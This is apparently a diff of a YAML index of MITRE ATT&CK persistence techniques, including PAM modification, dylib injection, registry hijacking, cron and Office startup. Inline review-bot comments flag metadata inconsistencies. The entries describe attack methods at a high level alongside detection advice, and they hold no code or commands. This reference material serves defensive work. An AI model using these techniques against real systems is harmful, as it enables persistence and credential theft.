- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -27129,20 +27481,57 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1574.007:
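Review bot: T1556.003 drops `x_mitre_permissions_required: - root` with nothing replacing it, while gaining `x_mitre_deprecated: false`, `revoked: false`, `x_mitre_attack_spec_version: 3.2.0` (from `2.1.0`) and `x_mitre_version: '2.1'` (from `'2.0'`); the large `-` block in the previous hunk and the `+` block here are otherwise a key reorder, with the `PAM Creds` reference now listed before `Red Hat PAM` and `description` placed before `url` in each reference. Please confirm the dropped `root` requirement is an intentional upstream removal, and describe the reorder in the PR so reviewers do not read the previous hunk as a deletion of the contributors and references.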
@@ -27232,7 +27621,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -27320,7 +27708,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -27405,11 +27792,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -27487,7 +27873,6 @@ persistence:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1546.006:
@@ -27520,7 +27905,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -27543,11 +27928,10 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -27605,9 +27989,8 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1542.001:
@@ -27688,12 +28071,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -27712,7 +28094,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -27726,7 +28107,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -27753,8 +28133,8 @@ persistence:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -27785,7 +28165,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
@@ -27842,11 +28223,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
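Review bot: after `spec_version` is removed, T1542.003 keeps `x_mitre_attack_spec_version: 3.1.0` and shows no `x_mitre_modified_by_ref` in the visible context, while most objects in this patch move to `3.2.0` and a few stay at `2.1.0` (T1205.002, T1546.006). Mixed spec versions are plausible if each object mirrors its own upstream state, but please confirm the sync is complete rather than partial. The T1547 `modified` bump in the same hunk looks fine.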
@@ -27918,9 +28298,9 @@ persistence:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -27936,12 +28316,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28016,7 +28395,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1542.005:
@@ -28059,7 +28437,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28083,8 +28461,6 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1543.003:
technique:
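Review bot: T1542.005 loses `x_mitre_attack_spec_version` entirely in this hunk (the 2.1.0 line is removed and no 3.2.0 line is added), whereas every other technique touched in this diff ends up with `x_mitre_attack_spec_version: 3.2.0`; T1505.002 further down shows the same gap. Check whether the upstream objects really lack the field or whether the generator drops it when it follows `x_mitre_permissions_required`, and add the 3.2.0 line if the latter.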
@@ -28239,31 +28615,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -28280,6 +28636,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -28290,9 +28647,13 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -28300,17 +28661,37 @@ persistence:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1137:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:01:21.255Z'
+ name: Office Application Startup
+ description: |-
+ Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+ A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Nick Carr, Mandiant
- Microsoft Threat Intelligence Center (MSTIC)
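Review bot: most of this hunk is key reordering for T1053.003 (`type`, `id`, `created`, `created_by_ref`, `external_references` and `object_marking_refs` move from the head of the block to its tail, and inside `external_references` the `url` now precedes `external_id`), which buries the one substantive addition, `x_mitre_remote_support: false`, and makes it hard to tell moves from real changes. If the new ordering is the generator's canonical output, say so in the commit message so reviewers know the churn is mechanical; otherwise consider emitting keys in a stable order so future index diffs stay reviewable.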
@@ -28318,79 +28699,73 @@ persistence:
- Praetorian
- Loic Jaquemet
- Ricardo Dias
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+ Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.4'
+ x_mitre_data_sources:
+ - 'File: File Creation'
+ - 'Application Log: Application Log Content'
+ - 'Windows Registry: Windows Registry Key Modification'
+ - 'File: File Modification'
+ - 'Module: Module Load'
+ - 'Process: Process Creation'
+ - 'Windows Registry: Windows Registry Key Creation'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137
url: https://attack.mitre.org/techniques/T1137
- - source_name: SensePost Ruler GitHub
- url: https://github.com/sensepost/ruler
- description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
- services. Retrieved February 4, 2019.'
+ external_id: T1137
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- source_name: TechNet O365 Outlook Rules
- url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
description: Koeller, B.. (2018, February 21). Defending Against Rules and
Forms Injection. Retrieved November 5, 2019.
+ url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
- source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: SensePost Ruler GitHub
+ description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+ services. Retrieved February 4, 2019.'
+ url: https://github.com/sensepost/ruler
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Office Application Startup
- description: |-
- Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
- A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- x_mitre_detection: |-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
- Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
- x_mitre_version: '1.3'
+ url: https://github.com/sensepost/notruler
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'File: File Creation'
- - 'Application Log: Application Log Content'
- - 'Windows Registry: Windows Registry Key Modification'
- - 'File: File Modification'
- - 'Module: Module Load'
- - 'Process: Process Creation'
- - 'Windows Registry: Windows Registry Key Creation'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1137
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
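Review bot: this hunk drops `x_mitre_permissions_required` (User, Administrator) from T1137 without a replacement, while T1053.003 in the preceding hunk keeps its `x_mitre_permissions_required: - User` as unchanged context and T1505.002 later keeps SYSTEM/Administrator/root. Either the field is being retired, in which case it should go consistently across all entries, or it was lost during regeneration; please confirm which. The platform rename from 'Office 365' to 'Office Suite' and the bump of `x_mitre_version` from '1.3' to '1.4' match the upstream ATT&CK change and look fine.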
@@ -28420,6 +28795,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -28430,6 +28806,7 @@ persistence:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -28438,13 +28815,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
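Review bot: T1098.003's platform list changes meaning here, not just spelling: 'Office 365' becomes 'Office Suite' and 'Google Workspace' plus 'Azure AD' collapse into 'Identity Provider'. Anything in this repository that selects techniques by the old platform strings (per-platform index files, filters, test matrices) needs the same rename in this change set, or those entries will silently drop out of the derived views; the bump to `x_mitre_version: '2.5'` is consistent with the upstream change.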
@@ -28486,9 +28863,6 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -28556,19 +28930,18 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
